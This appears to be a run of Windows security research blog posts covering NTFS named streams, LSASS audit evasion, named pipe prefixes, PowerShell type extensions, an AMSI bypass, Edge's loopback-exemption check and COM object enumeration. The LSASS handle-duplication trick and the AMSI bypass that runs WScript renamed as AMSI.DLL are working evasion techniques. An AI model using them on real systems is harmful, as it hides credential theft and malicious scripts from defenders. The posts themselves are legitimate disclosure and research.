Error code: (Win32) 0 (0) - The operation completed successfully.
Obja +00000009ac6ff828 at 00000009ac6ff828:
Name is :xyz
OBJ_CASE_INSENSITIVE
Error code: (Win32) 0 (0) - The operation completed successfully.
Obja +00000009ac6ff828 at 00000009ac6ff828:
Name is \??\C:\Users\user\AppData\Local\Temp\:xyz
OBJ_CASE_INSENSITIVE
Error code: (NTSTATUS) 0xc0000033 (3221225523) - Object Name invalid.


This at least explains why the second call to OpenFile with :xyz fails. Our call to GetFullPathName has resulted in a full path which is invalid. As I mentioned earlier you need a filename before the stream separator for the NTFS filename to be valid. But that doesn’t them explain why the first call did succeed.


The solution is CreateFile doesn’t resolve the relative path to a full path, but instead passes the same name we passed in, i.e. :xyz. This behavior's possible because the OBJECT_ATTRIBUTES structure has a RootDirectory field which contains a handle from where the kernel can start a parsing operation. Sadly !obja doesn’t print the handle value for us, so we’ll need to do it manually, replace the !obja part in the previous breakpoint to the following:


.printf \"Name: %msu Handle: %x\\n\", poi(@r8+10), poi(@r8+8)


If you change the breakpoint and re-run the application you'll get the following output:


Name: abc Handle: 94
Error code: (Win32) 0 (0) - The operation completed successfully.
Name: \??\C:\Users\user\AppData\Local\Temp\abc Handle: 0
Error code: (Win32) 0 (0) - The operation completed successfully.
Name: :xyz Handle: 94
Error code: (Win32) 0 (0) - The operation completed successfully.
Name: \??\C:\Users\user\AppData\Local\Temp\:xyz Handle: 0
Error code: (NTSTATUS) 0xc0000033 (3221225523) - Object Name invalid.


When the full path is being passed the handle is NULL, but when the relative path is used it’s the value 0x94. And what is handle 0x94? It’s a handle to the current directory, which in this case is the temp directory. So in theory we should find a named stream xyz on the temp directory if our theory is correct.


directory_stream.PNG


Let’s just check everything works as we expect, and let’s try it with a file as well:


directory_stream_2.PNG


So it works both for directories and files. The reason it works with CreateFile is we know the temp folder is writable, so we can create named streams. Parsing from an existing File object with a filename which starts with colon results in the NTFS filesystem accessing a named stream rather than a new file or subdirectory. It makes some kind of twisted sense, but the fact that a relative path can have a totally different behavior to a fully qualified path it clearly nor a designed in feature but an interaction between the way NTFS handles relative paths and how Win32 optimizes file access in the current directory.


I did find documentation for this behavior on MSDN, but I can no longer seem to find the page. It’s not on the obvious pages, and during searching you find archaic gems such as this. However, as I said I can’t find of a good use case for this behavior. If a privileged service is not canonicalizing and verifying paths then that’s already a potential security issue. And these paths have limited use, for example passing it to LoadLibrary fails as the path is canonicalized first and then opened.


Still, don't discount this misfeature as pointless. Never underestimate the value of unusual or undefined behavior in a system when looking for security vulnerabilities. I tend to collect, and document stupid things like this because you really never know when they might come in handy. An OS like Windows is so complex I'm always learning new things and behaviors, even before new features are added. Improving your knowledge of a system is one of the best ways to becoming an effective security researcher so don't be afraid to just mess around and test things. Even if you don't find a vulnerability you might at least get a new, interesting insight into how your platform of choice works.

Bypassing SACL Auditing on LSASS

$
0
0
Windows NT has supported the ability to audit resource access from day one. Any audit event ends up in the Security event log. To enable auditing an administrator needs to configure which types of resource access they want to audit in the Local or Group security policy, including whether to audit success and failure. Each resource to audit then needs to have a System Access Control List (SACL) applied which determines what types of access will be audited. The ACL can also specify a principal which limits the audit to specific groups.


My interest was piqued in this subject when I saw a tweet pointing out a change in Windows 10 which introduced a SACL for the LSASS process. The tweet contains a screenshot from a page describing changes in Windows 10 RTM. The implication is this addition of a SACL was to detect the use of tools such as Mimikatz which need to open the LSASS process. But does it work for that specific goal?


Let’s take apart this SACL for LSASS, what it means from an auditing perspective and then go into why this isn’t a great mechanism to discover Mimikatz or similar programs trying to access the memory of LSASS.


Let’s start by setting up a test system so we can verify the SACL is present, then enable auditing to check that we get auditing events when opening LSASS. I updated one of my Windows 10 1703 VMs, then installed the NtObjectManager PowerShell module.
lsass_open_annotated.png


A few things to note here, you must request the ACCESS_SYSTEM_SECURITY access right when opening the process otherwise you can’t access the SACL. You must also explicitly request the SACL when access the process’ security descriptor. We can see the SACL as an SDDL string, which matches with the SDDL string from the tweet/Microsoft web page. The SDDL representation isn’t a great way of understanding a SACL ACE, so I also expand it out in the middle. The expanded form tells us the ACE is an Audit ACE as expected, that the principal user is the Everyone group, the audit is enabled for both success and failure events and that the mask is set to 0x10.


Okay, let’s configure auditing for this event. I enabled Object Auditing in the system’s local security policy (for example run gpedit.msc) as shown:


audit_policy.PNG


You don’t need to reboot to change the auditing configuration, so just reopen the LSASS process as we did earlier in PowerShell, we should then see an audit event generated in the security event log as shown:


access_event_annotated.png


We can see that the event contains the target process (LSASS) and the source process (PowerShell) is logged. So how can we bypass this? Well let’s look back at what the SACL ACE means. The process the kernel goes through to determine whether to generate an audit event based on a SACL isn’t that much different from how the DACL is used in an access check. The kernel tries to find an ACE with a principal which is in the current token’s groups and the mask represents one or more access rights which the opened handle has been granted. So looking back at the SACL ACE we can conclude that the audit event will be generated if the current token has the Everyone group and the handle has been granted access 0x10. What’s 0x10 when applied to a process? We can find out using the Get-NtAccessMask cmdlet.


PS C:\> Get-NtAccessMask -AccessMask 0x10 -ToSpecificAccess Process
VmRead


This shows that the access represents PROCESS_VM_READ, which makes sense. If you’re trying to block a process scraping the contents of LSASS the handle needs that access right to call ReadProcessMemory.


The first thought for bypassing this is can you remove the Everyone group from your token and then open the process, at which point the audit rule shouldn’t match? Turns out not easily, for a start the only easy way of removing a group from a token is to convert it into a Deny Only group using CreateRestrictedToken. However, the kernel treats Deny Only groups as enabled for the purposes of auditing access checks. You can craft a new token without the group if you have SeCreateTokenPrivilege but it turns out that based on testing that the Everyone group is special and it doesn’t matter what groups you have in your token it will still match for auditing.


So what about the access mask instead? If you don’t request PROCESS_VM_READ then the audit event isn’t triggered. Of course we actually want that access right to do the memory scraping, so how could we get around this? One way is you could open the process for ACCESS_SYSTEM_SECURITY then modify the SACL to remove the audit entry. Of course changing a SACL generates an audit event, though a different event ID to the object access so if you’re not capturing those events you might miss it. But it turns out there’s at least one easier way, abusing handle duplication.


As I explained in a P0 blog post the DuplicateHandle system call has an interesting behaviour when using the pseudo current process handle, which has the value -1. Specifically if you try and duplicate the pseudo handle from another process you get back a full access handle to the source process. Therefore, to bypass this we can open LSASS with PROCESS_DUP_HANDLE access, duplicate the pseudo handle and get PROCESS_VM_READ access handle. You might assume that this would still end up in the audit log but it won’t. The handle duplication doesn’t result in an access check so the auditing functions never run. Try it yourself to prove that it does indeed work.


dup_process.PNG


Of course this is just the easy way of bypassing the auditing. You could easily inject arbitrary code and threads into the process and also not hit the audit entry. This makes the audit SACL pretty useless as malicious code can easily circumvent it. As ever, if you’ve got administrator level code running on your machine you’re going to have a bad time.

So what’s the takeaway from this? One thing is you probably shouldn’t rely on the configured SACL to detect malicious code trying to exploit the memory in LSASS. The SACL is very weak, and it’s trivial to circumvent. Using something like Sysmon should do a better job (though I’ve not personally tried it) or enabling Credential Guard should stop the malicious code opening LSASS in the first place.

UPDATE: I screwed up by description of Credential Guard. CG is using Virtual Secure Mode to isolate the passwords and hashes in LSASS from people scraping the information but it doesn't actually prevent you opening the LSASS process. You can also enable LSASS as a PPL which will block access but I wouldn't trust PPL security.

Named Pipe Secure Prefixes

$
0
0
When writing named pipe servers on Windows it’s imperative is do so securely. One common problem you’ll encounter is named pipe squatting, where a low privileged application creates a named pipe server either before the real server does or as a new instance of an existing server. This could lead to information disclosure if the server is being used to aggregate private data from a number of clients as well as elevation of privilege if the conditions are right.

There’s some programming strategies to try and eliminate named pipe squatting including passing the FILE_FLAG_FIRST_PIPE_INSTANCE flag to CreatedNamedPipe which will cause an error if the pipe already exists as well as appropriate configuration of the pipe’s security descriptor. A recent addition to Windows is named pipe secure prefixes, which make it easier to develop a named pipe server which isn’t vulnerable to squatting. Unfortunately I can’t find any official documentation on these prefixes or how you use them. Prefixes seem to be mentioned briefly in Windows Internals, but it doesn’t go into any detail about what they are or why they work. So this blog is an effort to remedy that lack of documentation.

First let’s start with how named pipes are named. Named pipes are exposed by the Named Pipe File System (NPFS) driver, which creates the \Device\NamedPipe device object. When you create a new named pipe instance you call CreateNamedPipe (really NtCreateNamedPipeFile under the hood) with the full path to the pipe to create. It’s typically to see this in the form \\.\pipe\PipeName where PipeName is the name you want to assign. At the native API level this path is converted to \??\pipe\PipeName; \??\pipe is a symbolic link which ultimately resolves this path to \Device\NamedPipe\PipeName.

Even though \Device\NamedPipe is a file system, NPFS doesn’t support directories other than the root. If you list the contents of the named pipe root directory you’ll notice that some of the names pipes have backslashes in the name, however NPFS just treats them as names as shown below.

named_pipes.PNG

So we’d assume we can’t have directories, but if we look at the function which handles IRP_MJ_CREATE dispatch in the NPFS driver we find something interesting:

NTSTATUS NpFsdCreate(PDEVICE_OBJECT device, PIRP irp){
 PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(irp);
 BOOLEAN directoryfile = stack->Parameters.Create.Options
                                & FILE_DIRECTORY_FILE;
 DWORD disposition = stack->Parameters.Create.Options >>24;
 NTSTATUS status;
 // Other stuff...

 if(directoryfile){ ← Check for creating a directory
   if(disposition == FILE_OPEN){
     status = NpOpenNamedPipePrefix(...);
   }elseif(disposition == FILE_CREATE
           || disposition == FILE_OPEN_IF){
     status = NpCreateNamedPipePrefix(...);
   }
 }

 // Even more stuff...
}

In the code we can see that the flag for creating a directory file is checked. If a directory file is requested then the driver tries to create or open a named pipe prefix. Let’s try and create one of these prefixes:

create_prefix.PNG

Well darn, it say it requires a privilege. Let’s dig into NpCreateNamedPipePrefix to see which privilege we’re missing.

NTSTATUS NpCreateNamedPipePrefix(...){ 
 // Blah blah...
 if(SeSinglePrivilegeCheck(SeExports->SeTcbPrivilege, UserMode)){
   // Continue...
 }else{
   return STATUS_PRIVILEGE_NOT_HELD;
 }
}

So that’s awkward, TCB privilege is only granted to SYSTEM users, not even to administrators. While as an administrator it’s not that hard to get a SYSTEM token the same can’t be said of LocalService or NetworkService accounts. At least let’s check if impersonating SYSTEM with TCB privilege will work to create a prefix:

create_prefix_working.PNG

We now have a new prefix called Badgers, so let’s try and create a new named pipe as a normal user under that prefix and see if it does anything interesting.

create_pipe_access_denied.PNG

We get STATUS_ACCESS_DENIED returned. This it turns out is because the driver will find the largest prefix that’s been registered and check if the caller has access to the prefix’s security descriptor. What’s the security descriptor for the Badgers prefix?
prefix_sd.PNG

Seems it’s just SYSTEM and Administrators group with access, which makes sense based on the original caller being SYSTEM. Therefore, if we supply a more permissive security descriptor then it should allow a normal user to create the pipe.

create_with_dacl.PNG

Another question, how can we get rid of an existing prefix? You just need to close all handles to the prefix and it will go away automatically.

As said it’s a pain that you need TCB privilege to create new secure prefixes especially for non-administrator service accounts. Has the system created any prefixes already? There’s nothing obvious in NPFS. After a bit of investigation the Session Manager process (SMSS) creates a number of known prefixes in the function SmpCreateProtectedPrefixes. For example SMSS creates the following prefixes:

\ProtectedPrefix\Administrators
\ProtectedPrefix\LocalService
\ProtectedPrefix\NetWorkService

Each of these prefixes have a DACL based on their name, e.g. LocalService has a DACL which only allows the LocalService user to create named pipes under that prefix.
prefix_sd-2.PNG

It’s worth noting that the owner for the prefixes is the Administrators group which means an administrator could open the prefixes and rewrite the DACL, if you really wanted to screw with the OS :-)

Anyway, if you’re writing a new named pipe server and you want to make it more difficult for named pipe squatting then adding an appropriate secure prefix will prevent other users, especially low privileged users from creating a new pipe with the same name. If someone knows where this is documented please let me know as I think it’s a useful security feature which few know about.

Adding a Command Line to PowerShell's Process Listing

$
0
0
My NtObjectManager PowerShell module has plenty of useful functions and cmdlets, but it's not really designed for general use-cases such as system administration. I was reminded of this when I got a reply to a tweet I made announcing a new version of the module.

While the Get-NtProcess cmdlet does have a CommandLine property it's not really a good idea to use it just for that. Each process object returned from the cmdlet is an instance of the NtProcess class which maintains an open handle. While the garbage collector should eventually kick in and clean up for you it's still bad practice to leave open handles lying around.

Wouldn't it be useful if you could get the command line of a process without requiring a large third party module? As pointed out in the tweet you can use WMI but it's uglier than calling Get-Process. It also has a small flaw, it doesn't show the command lines for elevated processes on the same desktop which Get-NtProcess can do (at least on Windows 8 and above).

So I decided to investigate how I might add the command line to the existing Get-Process cmdlet in the simplest way possible. To do so I expose some functionality in PowerShell which I'm guessing few realise exists, or for that matter need to use. First let's see what type of object Get-Process is returning. We can call GetType on the returned objects and find that out.

PS C:\> $ps = Get-Process
PS C:\> $ps[0].GetType() | select Fullname

FullName
--------
System.Diagnostics.Process

We can see that it's just returning the list of normal framework Process objects. Nothing too surprising there, however one thing is interesting, the object has more properties available than the Process class in the framework. A good example is the Path property which returns the full path to the main executable:

PS C:\> $ps[0] | select Path

Path
----
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Where does that come from? Using the Get-Member cmdlet gives us a clue.

PS C:\> $ps[0] | Get-Member Path

   TypeName: System.Diagnostics.Process

Name MemberType     Definition
---- ----------     ----------
Path ScriptProperty System.Object Path {get=$this.Mainmodule.FileName;}

Very interesting, it seems to a script property, after some digging it turns out this script is added in something called a Type Extension file which has been around since the early days of PowerShell. It allows you to add arbitrary properties and methods to existing types. The extensions for the Process class are in $PSHome\types.ps1xml, a snippet is shown below.

<Type>
 <Name>System.Diagnostics.Process</Name>
 <Members>
  <ScriptProperty>
   <Name>Path</Name>
    <GetScriptBlock>$this.Mainmodule.FileName</GetScriptBlock>
   </ScriptProperty>
...

Of course what I should have done first is just checked Lee Holmes blog where he wrote a description of these Type Extension files a mere 12 years ago! Anyway you can also get the help for this feature using running Get-Help about_Types.

This sounds ideal, we can add our create out own Type Extension file and add a scripted property to pull out the command line. We just need to write it, the easiest solution would be to use my NtApiDotNet .NET library, but if you're using that you might as well just use the NtObjectManager module to begin with as the library is what the module is built on. Therefore, we'll need to re-implement everything in C# using Add-Type then just invoke that to get the command line when necessary. This is not too hard, I just based it on the code in my library.

If you copy the gist into a file with a ps1xml extension you can then add the extension to the current session using the Update-TypeData cmdlet and passing the path to the file. If you want this to persist you can add the call to your profile, or save the session and reload it.

PS C:\> Update-TypeData .\command_line_type.ps1xml
PS C:\> Get-Process explorer | select CommandLine

CommandLine
-----------
C:\WINDOWS\Explorer.EXE

I've tried to make it as compact as possible, for example I don't enable SeDebugPrivilege which would be useful for administrators as it'd allow you to read the command line from almost any process on the system. You could add that feature if you like. One thing I had to do is also call OpenProcess on the PID, which is odd as the Process class actually has a SafeHandle property which returns a native handle for the process. Unfortunately the framework opens this handle with PROCESS_ALL_ACCESS rights, not the limited PROCESS_QUERY_LIMITED_INFORMATION access we require. This means that elevated processes can not be opened, removing the advantage this approach gives us.

This is also the reason WMI doesn't return all command lines. The WMI host process impersonates the caller when querying the command line for a process. WMI then uses an old method of extracting the command line by reading the command line directly from memory (using a technique similar to this StackOverflow post). As this requires PROCESS_VM_READ access this fails with elevated processes. Perhaps they should move to the NtQueryInformationProcess approach on modern versions of Windows ;-)

PS C:\> start -verb runas notepad test.txt
PS C:\> Get-WmiObject Win32_process | ? Name -eq "notepad.exe" | select CommandLine

CommandLine
-----------

PS C:\> Get-Process notepad | select CommandLine

CommandLine
-----------
"C:\WINDOWS\system32\notepad.exe" test.txt

Hope you find this information useful, there's loads of useful functionality in PowerShell which can make your life much easier. You just have to find it first :-)

Disabling AMSI in JScript with One Simple Trick

$
0
0
This blog contains a very quick and dirty way to disable AMSI in the context of Windows Scripting Host which doesn't require admin privileges or modifying registry keys/system state which an AV such as Defender should pick up on. It's for information purposes only, I've tested this on an up-to-date Windows 10 1803 machine.

It's come to my attention that a default script file from DotNetToJScript no longer works because Windows Defender blocks it, thanks a lot everyone who contributed to getting my tools flagged as malware.

Dialog showing Windows defender blocks DotNetToJScript through AMSI.

If you look carefully in the screenshot you'll see it shows that the "Affected items:" is prefixed with amsi:. This is an indication that the detection wasn't based on the file but due to behavior through the Antimalware Scan Interface. Certainly the script could be reworked to get around this issue (it seems to work for example in scriptlets oddly enough) but I'll probably never need to bother as I never wrote it for the use cases "Sharpshooter" uses it for. Still I had an idea for a way of bypassing AMSI which I thought I'd test out.

I was in part inspired to dig this technique out again after seeing MDSec's recent work on newer bypasses for AMSI in PowerShell as well as a BlackHat Asia talk from Tal Liberman. However I've not seen this technique described anywhere else, but I'm sure someone can correct me if I'm wrong.


How AMSI Is Loaded in Windows Scripting Host

AMSI is implemented as an COM server which is used to communicate to the installed security product via an internal channel. A previous attack against AMSI was actually to hijack this COM registration as documented by Matt Nelson. The scripting host is not supposed to call the COM object directly, instead it calls methods via exported functions in AMSI.DLL, we can watch being loaded by setting an appropriate filter in Process Monitor. 

AMSI loading into WScript.exe

We can use the stack trace feature of Process Monitor to find the code responsible for loading AMSI.DLL. It's actually part of the scripting engine, such as JScript or VBScript rather than a core part of WSH. The basics of the code are below.

HRESULTCOleScript::Initialize(){hAmsiModule=LoadLibraryExW(L"amsi.dll",nullptr,LOAD_LIBRARY_SEARCH_SYSTEM32);if(hAmsiModule){ ①// Get initialization functions. FARPROCpAmsiInit=GetProcAddress(hAmsiModule,"AmsiInitialize");pAmsiScanString=GetProcAddress(hAmsiModule,"AmsiScanString");if(pAmsiInit){if(pAmsiScanString&&FAILED(pAmsiInit(&hAmsiContext))) ②hAmsiContext=nullptr;}}bInit=TRUE; ③returnbInit;}

Based on this code we can see it loading the AMSI DLL then calling AmsiInitialize to get a context handle. The interesting thing about this code is regardless of whether AMSI initializes or not it will always return success . This leads to three ways of causing this code to fail and therefore never initialize AMSI, block loading AMSI.DLL, make AMSI.DLL not contain methods such as AmsiInitialize, or cause AmsiInitialize to fail.

These are somewhat interconnected. For example Tal Liberman mentions in his presentation (slide 56) that you could copy an AMSI using application to another directory and it will try and load AMSI.DLL from that directory. As this AMSI can be some unrelated DLL which doesn't export AmsiInitialize then the load will succeed but the rest will fail. Unfortunately this trick won't work here as the flag LOAD_LIBRARY_SEARCH_SYSTEM32 is being passed which means LoadLibraryEx will always try and load from SYSTEM32 first. Getting AmsiInitialize to fail will be a pain, and we can't trivially prevent this code load AMSI.DLL from SYSTEM32, so what do we do? We preload an alternative AMSI.DLL of course.

Hijacking AMSI.DLL

How do we go about loading an alternative AMSI.DLL with the least amount of effort possible? Something which perhaps not everyone realizes is that LoadLibrary will try and find an existing loaded DLL with the requested name so that it doesn't load the same DLL twice. This works not just for the name of the DLL but also the main executable. Therefore if we can convince the library loader that our main executable is actually called AMSI.DLL then it'll return that instead. Unable to find AmsiInitialize exported this should result in AMSI failing to initialize but continuing to execute a script without inspecting it. 

How can we change the name of our main executable to AMSI.DLL without modifying process memory? Simple, we copy WSCRIPT.EXE to another directory but call it AMSI.DLL then run it. Wait, what? How can we run AMSI.DLL, doesn't it need to SOMETHING.EXE? On Windows there's two main ways of executing a process, ShellExecute or CreateProcess. When calling ShellExecute the API looks up the handler for the extension, such as .EXE or .DLL and performs particular actions based on the result. Generally .EXE will redirect to just calling CreateProcess, where as for .DLL it'll try and load it in a registered viewer, on a default system there probably isn't one. However, CreateProcess doesn't care what extension the file has as long as it's an Executable File based on its PE header. [Aside, you can actually execute a DLL using the native APIs, but we don't have access to that from WSH]. Therefore, as long as we can call CreateProcess on AMSI.DLL which is actually a copy of WSCRIPT.EXE it will execute. To do this we can just use WScript.Shell'sExec method which just calls CreateProcess directly.

varobj=newActiveXObject("WScript.Shell");obj.Exec("amsi.dll dotnettojscript.js");

This results in a process called AMSI.DLL running. When JScript or VBScript tries to load AMSI.DLL it now gets back a reference to main executable and AMSI no longer works. From what I can tell this short script doesn't get detected by AMSI itself, so it's safe to run to bootstrap the "real" code you want to run.

WScript.Exe running as AMSI.DLL

To summarise the attack:

  1. Start a stub script which copies WSCRIPT.EXE to a known location but with the name AMSI.DLL. This is still the same catalog signed executable just in a different location so would likely bypass detection based purely on signatures.
  2. In the stub script execute the newly created AMSI.DLL with the "real" script.
  3. Err, that's about it.

AFAIK this doesn't work with PowerShell because it seems to break something important inside the code which renders PS inoperable. Whether this is by design or not I've no idea. Anyway, I know this is a silly way of bypassing AMSI but it just shows that this sort of self-checking feature rarely works out very well when malware could very easily modify the platform which is doing the detection.









UWP Localhost Network Isolation and Edge

$
0
0

This blog post describes an interesting “feature” added to Windows to support Edge accessing the loopback network interface. For reference this was on Windows 10 1803 running Edge 42.17134.1.0 as well as verifying on Windows 10 RS5 17713 running 43.17713.1000.0.

I like the concept of the App Container (AC) sandbox Microsoft introduced in Windows 8. It moved sandboxing on Windows from restricted tokens which were hard to reason about and required massive cludges to get working to a reasonably consistent capability based model where you are heavily limited in what you can do unless you’ve been granted an explicit capability when your application is started. On Windows 8 this was limited to a small set of known capabilities. On Windows 10 this has been expanded massively by effectively allowing an application to define its own capabilities and enforce them though the normal Windows access control mechanisms.

I’ve been looking at AC more and it's ability to do network isolation, where access to the network requires being granted capabilities such as “internetClient”, seems very useful. It’s a little known fact that even in the most heavily locked down, restricted token sandbox it’s possible to open network sockets by accessing the raw AFD driver. AC solves this issue quite well, it doesn’t block access to the AFD driver, instead the Firewall checks for the capabilities and blocks connecting or accepting sockets.

One issue does come up with building a generic sandboxing mechanism this AC network isolation primitive is regardless of what capabilities you grant it’s not possible for an AC application to access localhost. For example you might want your sandboxed application to access a web server on localhost for testing, or use a localhost proxy to MITM the traffic. Neither of these scenarios can be made to work in an AC sandbox with capabilities alone.

The likely rationale for blocking localhost is allowing sandboxed content access can also be a big security risk. Windows runs quite a few services accessible locally which could be abused, such as the SMB server. Rather than adding a capability to grant access to localhost, there's an explicit list of packages exempt from the localhost restriction stored by the firewall service. You can access or modify this list using the Firewall APIs such as the  NetworkIsolationSetAppContainerConfigfunction or using the CheckNetIsolationtool installed with Windows. This behavior seems to be rationalized as accessing loopback is a developer feature, not something which real applications should rely on. Curious, I wondered whether I had AC’s already in the exemption list. You can list all available exemptions by running “CheckNetIsolation LoopbackExempt -s” on the command line.


On my Windows 10 machine we can see two exemptions already installed, which is odd for a developer feature which no applications should be using. The first entry shows “AppContainer NOT FOUND” which indicates that the registered SID doesn’t correspond to a registered AC. The second entry shows a very unhelpful name of “001” which at least means it’s an application on the current system. What’s going on? We can use my NtObjectManager PS module and it's 'Get-NtSid' cmdlet  on the second SID to see if that can resolve a better name.


Ahha, “001” is actually a child AC of the Edge package, we could have guessed this by looking at the length of the SID, a normal AC SID had 8 sub authorities, whereas a child has 12, with the extra 4 being added to the end of the base AC SID. Looking back at the unregistered SID we can see it’s also an Edge AC SID just with a child which isn’t actually registered. The “001” AC seems to be the one used to host Internet content, at least based on the browser security whitepaper from X41Sec (see page 54).

This is not exactly surprising. It seems when Edge was first released it wasn’t possible to access localhost resources at all (as demonstrated by an IBM help article which instructs the user to use CheckNetIsolation to add an exemption). However, at some point in development MS added an about:flags option to enable accessing localhost, and seems it’s now the default configuration, even though as you can see in the following screenshot it says enabling can put your device at risk.


What’s interesting though is if you disable the flags option and restart Edge then the exemption entry is deleted, and re-enabling it restores the entry again. Why is that a surprise? Well based on previous knowledge of this exemption feature, such as this blog post by Eric Lawrence you need admin privileges to change the exemption list. Perhaps MS have changed that behavior now? Let’s try and add an exemption using the CheckNetIsolationtool as a normal user, passing “-a -p=SID” parameters.


I guess they haven’t as adding a new exemption using the CheckNetIsolation tool gives us access denied. Now I’m really interested. With Edge being a built-in application of course there’s plenty of ways that MS could have fudged the “security” checks to allow Edge to add itself to the list, but where is it?

The simplest location to add the fudge would be in the RPC service which implements the NetworkIsolationSetAppContainerConfig. (How do I know there's an RPC service? I just disassembled the API). I took a guess and assumed the implementation would be hosted in the “Windows Defender Firewall” service, which is implemented in the MPSSVC DLL. The following is a simplified version of the RPC server method for the API.

HRESULT RPC_NetworkIsolationSetAppContainerConfig(handle_t handle,
    DWORD dwNumPublicAppCs,
    PSID_AND_ATTRIBUTES appContainerSids){

  if(!FwRpcAPIsIsPackageAccessGranted(handle)){
    HRESULT hr;
    BOOL developer_mode = FALSE:
    IsDeveloperModeEnabled(&developer_mode);
    if(developer_mode){
      hr = FwRpcAPIsSecModeAccessCheckForClient(1, handle);
      if(FAILED(hr)){
          return hr;
      }
    }
    else
    {
      hr =FwRpcAPIsSecModeAccessCheckForClient(2,handle);
      if(FAILED(hr)){
          return hr;
      }
    }
  }
  return FwMoneisAppContainerSetConfig(dwNumPublicAppCs,
                                       appContainerSids);
}

What’s immediately obvious is there's a method call, FwRpcAPIsIsPackageAccessGranted, which has “Package” in the name which might indicate it’s inspecting some AC package information. If this call succeeds then the following security checks are bypassed and the real function FwMoneisAppContainerSetConfigis called. It's also worth noting that the security checks differ depending on whether you're in developer mode or not. It turns out that if you have developer mode enabled then you can also bypass the admin check, which is confirmation the exemption list was designed primarily as a developer feature.

Anyway let's take a look at FwRpcAPIsIsPackageAccessGranted to see what it’s checking.

const WCHAR* allowedPackageFamilies[]={
  L"Microsoft.MicrosoftEdge_8wekyb3d8bbwe",
  L"Microsoft.MicrosoftEdgeBeta_8wekyb3d8bbwe",
  L"Microsoft.zMicrosoftEdge_8wekyb3d8bbwe"
};

HRESULT FwRpcAPIsIsPackageAccessGranted(handle_t handle){
  HANDLE token;
  FwRpcAPIsGetAccessTokenFromClientBinding(handle,&token);

  WCHAR* package_id;
  RtlQueryPackageIdentity(token,&package_id);
  WCHAR family_name[0x100];
  PackageFamilyNameFromFullName(package_id,family_name)

  for(int i =0;
       i < _countof(allowedPackageFamilies);
       ++i){
      if(wcsicmp(family_name,
           allowedPackageFamilies[i])==0){
        return S_OK;
      }
  }
  return E_FAIL;
}

The FwRpcAPIsIsPackageAccessGranted function gets the caller’s token, queries for the package family name and then checks it against a hard coded list. If the caller is in the Edge package (or some beta versions) the function returns success which results in the admin check being bypassed. The conclusion we can take is this is how Edge is adding itself to the exemption list, although we also want to check what access is required to the RPC server. For an ALPC server there’s two security checks, connecting to the ALPC port and an optional security callback. We could reverse engineer it from service binary but it is easier just to dump it from the ALPC server port, again we can use my NtObjectManagermodule.


As the RPC service doesn’t specify a name for the service then the RPC libraries generate a random name of the form “LRPC-XXXXX”. You would usually use EPMAPPER to find the real name but I just used a debugger on CheckNetIsolationto break on NtAlpcConnectPort and dumped the connection name. Then we just find the handle to that ALPC port in the service process and dump the security descriptor. The list contains Everyone and all the various network related capabilities, so any AC process with network access can talk to these APIs including Edge LPAC. Therefore all Edge processes can access this capability and add arbitrary packages. The implementation inside Edge is in the function emodel!SetACLoopbackExemptions.

With this knowledge we can now put together some code which will exploit this “feature” to add arbitrary exemptions. You can find the PowerShell script on my Github gist.


Wrap Up

If I was willing to speculate (and I am) I’d say the reason that MS added localhost access this way is it didn’t require modifying kernel drivers, it could all be done with changes to user mode components. Of course the cynic in me thinks this could actually be just there to make Edge more equal than others, assuming MS ever allowed another web browser in the App Store. Even a wrapper around the Edge renderer would not be allowed to add the localhost exemption. It’d be nice to see MS add a capability to do this in the future, but considering current RS5 builds use this same approach I’m not hopeful.

Is this a security issue? Well that depends. On the one hand you could argue the default configuration which allows Internet facing content to then access localhost is dangerous in itself, they point that out explicitly in the about:flagsentry. Then again all browsers have this behavior so I’m not sure it’s really an issue.

The implementation is pretty sloppy and I’m shocked (well not that shocked) that it passed a security review. To list some of the issues with it:
      The package family check isn’t very restrictive, combined with the weak permissions of the RPC service it allows any Edge process to add an arbitrary exemption.
      The exemption isn’t linked to the calling process, so any SID can be added as an exemption.

While it seems the default is only to allow the Internet facing ACs access to localhost because of these weaknesses if you compromised a Flash process (which is child AC “006”) then it could add itself an exemption and try and attack services listening on localhost. It would make more sense if only the main MicrosoftEdgeprocess could add the exemptions, not any content process. But what would make the most sense would be to support this functionality through a capability so that everyone could take advantage of it rather than implementing it as a backdoor.



Finding Interactive User COM Objects using PowerShell

$
0
0
Easily one of the most interesting blogs on Windows behaviour is Raymond Chen's The Old New Thing. I noticed he'd recently posted about using "Interactive User" (IU) COM objects to go from an elevated application (in the UAC sense) to the current user for the desktop. What interested me is that registering arbitrary COM objects as IU can have security consequences, and of course this blog entry didn't mention anything about that.

The two potential security issues can be summarised as:

  1. An IU COM object can be a sandbox escape if it has non-default security (for example Project Zero Issue 1079) as you can start a COM server outside the sandbox and call methods on the object.
  2. An IU COM object can be a cross-session elevation of privilege if it has non-default security ( for example Project Zero Issue 1021) as you can start a COM server in a different console session and call methods on the object.
I've blogged about this before when I discuss how I exploited a reference cycle bug in NtCreateLowBoxToken (see Project Zero Issue 483) and discussed how to use my OleView.NET tool find classes to check. Why do I need another blog post about it? I recently uploaded version 1.5 of my OleView.NET tool which comes with a fairly comprehensive PowerShell module and this seemed like a good opportunity on doing a quick tutorial on using the module to find targets for analysis to see if you can find a new sandbox escape or cross session exploit.

Note I'm not discussing how you go about reverse engineering the COM implementation for anything we find. I also won't be dropping any unknown bugs, but just giving you the information needed to find interesting COM servers.

Getting Started with PowerShell Module


First things first, you'll need to grab the release of v1.5 from the THIS LINK (edit: you can now also get the module from the PowerShell Gallery). Unpack it to a directory on your system then open PowerShell and navigate to the unpacked directory. Make sure you've allowed arbitrary scripts to run in PS, then run the following command to load the module.

PS C:\> Import-Module .\OleViewDotNet.psd1

As long as you see no errors the PS module will now be loaded. Next we need to capture a database of all COM registration information on the current machine. Normally when you open the GUI of OleView.NET the database will be loaded automatically, but not in the module. Instead you'll need load it manually using the following command:

PS C:\> Get-ComDatabase -SetCurrent

The Get-ComDatabase cmdlet parses the system configuration for all COM information my tool knowns about. This can take some time (maybe up to a minute, more if you have Process Monitor running), so it'll show a progress dialog. By specifying the -SetCurrent parameter we will store the database as the current global database, for the current session. Many of the commands in the module take a -Database parameter where you can specify the database you want to extract information from. Ensuring you pass the correct value gets tedious after a while so by setting the current database you never need to specify the database explicitly (unless you want to use a different one).

Now it's going to suck if every time you want to look at some COM information you need to run the lengthy Get-ComDatabase command. Trust me, I've stared at the progress bar too long. That's why I implemented a simple save and reload feature. Running the following command will write the current database out to the file com.db:

PS C:\> Set-ComDatabase .\com.db

You can then reload using the following command:

